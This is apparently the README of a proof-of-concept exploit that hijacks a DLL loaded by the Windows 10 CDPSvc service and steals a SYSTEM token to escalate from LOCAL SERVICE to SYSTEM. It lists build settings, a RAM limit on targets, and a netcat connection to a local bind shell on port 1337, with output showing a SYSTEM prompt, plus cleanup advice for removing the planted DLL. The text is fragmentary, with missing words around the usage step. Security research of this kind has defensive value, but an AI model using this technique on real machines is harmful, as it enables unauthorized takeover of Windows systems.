Windows 10 CDPSvc DLL Hijacking - From LOCAL SERVICE to SYSTEM
For more information please visit this blog post.
/!\ This technique works only if the target machine has less than 3.5GB of RAM! Otherwise each service runs in a separate process and the Token Kidnapping technique is therefore useless.
Dynamic Library (.dll)
Multithread (/MT)
nc.exe
to connect to the local port 1337.C:\TOOLS\>nc64.exe 127.0.0.1 1337
[*] Searching for a SYSTEM token...
[+] SYSTEM token found.
[+] CreateProcessAsUser() OK
Microsoft Windows [version 10.0.18362.476]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt auhtority\system
/!\ At this point, I'd suggest to stop the service, delete the DLL and restart the service. Otherwise you won't be able to delete the file. Your shell won't die because it runs in a separate process.